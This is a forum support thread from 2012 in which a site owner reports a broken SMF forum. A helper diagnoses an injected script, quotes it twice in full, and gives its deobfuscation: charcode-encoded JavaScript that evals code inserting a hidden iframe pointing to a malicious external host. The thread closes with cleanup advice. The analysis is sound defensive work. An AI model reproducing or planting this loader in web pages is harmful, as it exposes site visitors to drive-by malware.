Guys, I dont know what happened all of a sudden
Forum got messed up.. All the categories, board descriptions, etc at Index page is displaying in BIG letters.. Unable to post anything, just a white blank screen appears if we click on submit. Unable to login sometimes (session timed out error pops out). Even login problems are arising :(
There isnt any change I did to the forum. The last mod I installed to forum was Global Header and Footer mod. But this mod was installed a day back and I uninstalled too due to an issue with pruning messages in certain boards via admin panel.
I still couldn't figure out how exactly it got happened.... I really need help regarding this. Its a serious issue !!!
For anyone who wish to try
Here is the forum link : http://forum.gizmolord.com
You are infected by a script it is injecting a javascript based on your pages:
<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}
if(aa.indexOf(aaa)!==-1)
e(s);</script>
Unpacked does the following
//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://qlkiyu.dns1.us/d/404.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);} //document.write (s) <iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var s = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer
Quote from: vbgamer45 on February 23, 2012, 12:23:17 AM
You are infected by a script it is injecting a javascript based on your pages:
<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!74!69!68!66!82!78!7!61!71!76!10!7!78!76!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}
if(aa.indexOf(aaa)!==-1)
e(s);</script>
Unpacked does the following
//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://qlkiyu.dns1.us/d/404.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);} //document.write (s) <iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var s = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://qlkiyu.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer
Thanks mate....will this affect the database too ?
Uploading new forum with same database will solve this issue ?
You should go through all your files. Most SMF files can be cleaned up by doing a large upgrade, which will effectivily overwrite all infected files with clean copies of them. There is no quarantee that your database is untouched, so you should at least change all admin passwords and similar info.